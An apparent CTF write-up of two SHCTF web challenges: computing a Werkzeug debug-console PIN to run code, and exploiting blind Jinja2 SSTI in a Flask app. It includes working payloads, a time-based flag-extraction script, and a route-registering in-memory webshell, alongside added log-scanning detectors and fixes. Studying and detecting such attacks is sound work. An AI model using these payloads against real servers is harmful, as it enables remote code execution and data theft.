shctf week3-web

[Week3] 顰

Flask: computing the PIN

https://werkzeug.palletsprojects.com/en/3.0.x/debug/

Requests to the debug console must come from a trusted host.

Add the header Host: 127.0.0.1:port

Because every request needs this Host header, I wrote a demo app and captured its traffic to obtain the parameters used to submit the PIN for verification and the parameters used to execute commands.

from flask import Flask

app = Flask(__name__)


@app.route("/")
def hello():
    return 'test'


if __name__ == "__main__":
    # debug=True enables the Werkzeug debugger console on this demo
    app.run(host="0.0.0.0", port=8080, debug=True)

?__debugger__=yes&cmd=pinauth&pin=119-178-555&s=1aobhiUuRbIB9bPSOM2Z

(This string is SECRET = "1aobhiUuRbIB9bPSOM2Z"; it can be found by viewing the page source.)

Computing the PIN

import hashlib
from itertools import chain


def mac_to_decimal(mac_address):
    # Split the MAC address into its hex pairs
    hex_pairs = mac_address.split(':')

    # Accumulate the pairs into one integer, most significant byte first
    decimal_value = 0
    for hex_pair in hex_pairs:
        decimal_value = (decimal_value << 8) + int(hex_pair, 16)

    return decimal_value


mac_address = "42:a8:3c:60:79:d0"  # /sys/class/net/eth0/address

# Convert the MAC address to its decimal form (the value uuid.getnode() returns)
mac = str(mac_to_decimal(mac_address))

# Four separate elements: keep the trailing commas, otherwise adjacent string literals
# are concatenated into one element and the hash (and PIN) comes out wrong
probably_public_bits = [
    'root',  # username, obtainable from /etc/passwd
    'flask.app',  # modname, default value
    'Flask',  # default value of getattr(app, '__name__', getattr(app.__class__, '__name__'))
    '/usr/local/lib/python3.10/site-packages/flask/app.py',  # path, obtainable from an error page: getattr(mod, '__file__', None)
]

private_bits = [
    mac,  # MAC address in decimal
    'd45a88e1-3fe4-4156-9e59-3864587b7c87',
    # /proc/sys/kernel/random/boot_id + /proc/self/cgroup (name=systemd:); /proc/self/cgroup was empty here, so it is ignored
]

# The rest is copied from the Werkzeug source and needs no changes
h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv = None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)

Getting the cookie

__wzd7601fb13e6a573dccdb2=1729661381|c7574ed074d1

From the demo, the parameters for sending a command:

/console?&__debugger__=yes&cmd=open('/flag').read()&frm=0&s=1aobhiUuRbIB9bPSOM2Z
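As an added example (not from the original writeup), here is a detection script for the console flow described above: it scans web server access-log lines for Werkzeug debugger requests, separating the __debugger__=yes / cmd=pinauth PIN submission from any other cmd value, which the console evaluates as Python, and reports them per client. The log lines are constructed samples built from the request parameters shown in this writeup; the log format assumed is the common combined format, and the verdict names are my own.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined-format access log line: we only need client IP, timestamp, method, target, status.
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Werkzeug console commands that load resources or handle the PIN rather than run code.
_NON_EXEC_CMDS = {"pinauth", "printpin", "resource"}


def parse_log_line(line):
    """Parse one access-log line into a dict; return None for lines that do not match."""
    m = _LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "method": m.group("method"),
        "path": parts.path,
        "query": parse_qs(parts.query, keep_blank_values=True),
        "status": int(m.group("status")),
    }


def classify(rec):
    """Map one parsed request to a verdict string, or None if it is unremarkable."""
    q = rec["query"]
    debugger = q.get("__debugger__", [""])[0] == "yes"
    cmd = q.get("cmd", [""])[0]
    if debugger and cmd == "pinauth":
        # One PIN submission; a burst of these from one client is a guessing attempt.
        return "debugger-pin-auth"
    if debugger and cmd and cmd not in _NON_EXEC_CMDS:
        # Any other cmd value is Python source that the console evaluates.
        return "debugger-code-exec"
    if rec["path"].rstrip("/").endswith("/console") and rec["status"] == 200:
        # The interactive console page itself was served to a client.
        return "debugger-console-reachable"
    return None


def scan(lines):
    """Run classify() over log lines and return the findings in order."""
    findings = []
    for line in lines:
        rec = parse_log_line(line)
        if rec is None:
            continue
        verdict = classify(rec)
        if verdict:
            findings.append({"ip": rec["ip"], "ts": rec["ts"],
                             "path": rec["path"], "verdict": verdict})
    return findings


def pin_attempts_by_ip(findings):
    """Count PIN submissions per client, for spotting guessing attempts."""
    counts = {}
    for f in findings:
        if f["verdict"] == "debugger-pin-auth":
            counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


# Constructed sample log. The two console requests mirror the parameters captured above.
SAMPLE_LOG = r'''
10.0.0.5 - - [22/Nov/2024:10:01:02 +0000] "GET /console HTTP/1.1" 200 1532
10.0.0.5 - - [22/Nov/2024:10:01:05 +0000] "GET /console?__debugger__=yes&cmd=pinauth&pin=119-178-555&s=1aobhiUuRbIB9bPSOM2Z HTTP/1.1" 200 40
10.0.0.5 - - [22/Nov/2024:10:01:09 +0000] "GET /console?&__debugger__=yes&cmd=open('/flag').read()&frm=0&s=1aobhiUuRbIB9bPSOM2Z HTTP/1.1" 200 120
10.0.0.9 - - [22/Nov/2024:10:02:00 +0000] "GET /?name=alice HTTP/1.1" 200 55
'''.strip().splitlines()

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ts"], f["ip"], f["path"], f["verdict"])
```

The Host header the writeup adds is chosen by the client, so the console's trusted-host check is not a boundary a defender can rely on; the fix is to never run with debug=True on a reachable interface. Werkzeug does stop accepting PIN submissions after a run of failures, so a burst of debugger-pin-auth findings from one IP is still worth alerting on, and a single debugger-code-exec finding means the console was already unlocked.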

[Week3] love_flask

Source code:

from flask import Flask, request, render_template_string

app = Flask(__name__)

html_template = ''  # placeholder: the challenge's input page template is not shown in the writeup


@app.route('/')
def pretty_input():
    return render_template_string(html_template)


@app.route('/namelist', methods=['GET'])
def name_list():
    name = request.args.get('name')
    # user input is formatted into the template source itself, then rendered
    template = '<h1>Hi, %s.</h1>' % name
    rendered_string = render_template_string(template)
    if rendered_string:
        return 'Success Write your name to database'
    else:
        return 'Error'


if __name__ == '__main__':
    app.run(port=8080)

User-controlled input goes straight into a rendered template: obvious SSTI.

The difference here is that the rendered result is never returned, so the SSTI output is not echoed back.

There is no filtering at all.

Because name is inserted by string formatting here, control statements such as {% if %} / {% for %} cannot be used.

So there are two approaches.

Approach 1

Blind injection. A failed render returns a 500, so the status code can be used first to brute-force the subclass index that reaches eval.

/namelist?name={{().__class__.__base__.__subclasses__()[{{int(100-200)}}].__init__.__globals__['__builtins__']['eval']('__import__("time").sleep(3)')}}

Then the flag is extracted by building in a time delay.

import requests
import time

flag = 'SHCTF{'
table = '-ABCDEFabcdef0123456789'  # character set assumed for the flag body
url = 'http://210.44.150.15:25528/namelist?name='

for length in range(7, 43):  # length of the prefix being tested (known prefix + one guessed character)
    for i in table:
        ii = flag + i
        start_time = time.time()
        # the shell command sleeps 2s only if the first `length` bytes of /flag equal the guessed prefix
        data = "{{" + "().__class__.__base__.__subclasses__()[100].__init__.__globals__['__builtins__']['eval']('__import__(\"os\").popen(\"if [ $(head -c {} /flag) = {} ]; then sleep 2; fi\").read()')".format(length, ii) + "}}"
        # print(data)
        url1 = url + data
        r = requests.get(url1)
        end_time = time.time()
        response_time = end_time - start_time
        if response_time >= 2:  # delay observed: the guess was correct
            flag = flag + i
            print(flag)
            break

print(flag + '}')

Approach 2

In-memory webshell

https://xz.aliyun.com/t/10933?time__1311=CqjxRQiQqQqqlxGg6QGCDcmQD80rdDCbAeD

An in-memory shell needs no file upload and writes no file to disk. It works by dynamically registering a route that serves as the entry point for the command parameter.
{{url_for.__globals__['__builtins__']['eval']("app.add_url_rule('/shell', 'shell', lambda :__import__('os').popen(_request_ctx_stack.top.request.args.get('cmd', 'whoami')).read())",{'_request_ctx_stack':url_for.__globals__['_request_ctx_stack'],'app':url_for.__globals__['current_app']})}}
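Added example, not part of the original writeup or the challenge: an indicator scan for the two payload styles above (the timing-oracle probe and the route-registering shell), run over constructed sample requests. It assumes request targets are available URL-encoded as a client library sends them, uses only the standard library, and the indicator names are my own labels.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote, quote

# Indicator patterns applied to each URL-decoded parameter value. The names are this
# example's own labels, not Flask or Jinja2 terminology.
INDICATORS = {
    "jinja-expression": re.compile(r"\{\{|\{%"),
    "dunder-traversal": re.compile(r"__(?:class|base|mro|subclasses|init|globals|builtins|import)__"),
    "code-exec": re.compile(r"\b(?:eval|exec|popen|system|__import__)\s*\("),
    "route-injection": re.compile(r"\badd_url_rule\s*\("),
    "timing-oracle": re.compile(r"\bsleep\b"),
}


def ssti_indicators(value):
    """Indicator names (sorted) that fire on one parameter value.
    The value is decoded once more so double-encoded braces are not missed."""
    decoded = unquote(value)
    return sorted(name for name, rx in INDICATORS.items() if rx.search(decoded))


def scan_target(target):
    """Inspect every query parameter of a request target; return {param: [indicators]} for hits only."""
    parts = urlsplit(target)
    hits = {}
    for param, values in parse_qs(parts.query, keep_blank_values=True).items():
        found = set()
        for v in values:
            found.update(ssti_indicators(v))
        if found:
            hits[param] = sorted(found)
    return hits


def scan_requests(records):
    """records: iterable of (client_ip, request_target). One finding per request with a hit."""
    findings = []
    for ip, target in records:
        hits = scan_target(target)
        if hits:
            findings.append({"ip": ip, "path": urlsplit(target).path, "hits": hits})
    return findings


def probing_sources(findings, threshold=5):
    """(ip, path) pairs with at least `threshold` flagged requests. A blind timing
    extraction sends one request per candidate character, so it stands out here
    even when each individual probe looks like a one-off test."""
    counts = {}
    for f in findings:
        key = (f["ip"], f["path"])
        counts[key] = counts.get(key, 0) + 1
    return sorted(k for k, n in counts.items() if n >= threshold)


# Constructed sample traffic. _BLIND is the timing probe from the script above with the
# byte count varied as that script does; _SHELL is the route-registering payload, abbreviated.
# Both are percent-encoded the way a client library sends them.
_BLIND = ("{{().__class__.__base__.__subclasses__()[100].__init__.__globals__['__builtins__']['eval']"
          "('__import__(\"os\").popen(\"if [ $(head -c %d /flag) = SHCTF{ ]; then sleep 2; fi\").read()')}}")
_SHELL = ("{{url_for.__globals__['__builtins__']['eval']"
          "(\"app.add_url_rule('/shell', 'shell', lambda: __import__('os').popen('...').read())\")}}")

SAMPLE_REQUESTS = (
    [("10.0.0.5", "/namelist?name=" + quote(_BLIND % n, safe="")) for n in range(7, 13)]
    + [("10.0.0.7", "/namelist?name=" + quote(_SHELL, safe=""))]
    + [("10.0.0.9", "/namelist?name=alice")]
)

if __name__ == "__main__":
    for f in scan_requests(SAMPLE_REQUESTS):
        print(f["ip"], f["path"], f["hits"])
    print("automated probing from:", probing_sources(scan_requests(SAMPLE_REQUESTS)))
```

The real fix for name_list is to pass name into the template context (render_template_string('<h1>Hi, {{ name }}.</h1>', name=name)) rather than formatting it into the template source; the scanner is for spotting attempts against code that has not been fixed yet. Matching is done on the decoded value because the probes arrive percent-encoded, and the per-(ip, path) count is what separates the character-by-character extraction from a single probe.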


Permalink: http://example.com/2024/11/22/shctf week3/
Author: J_0k3r
Published: 22 November 2024
License: BY J_0K3R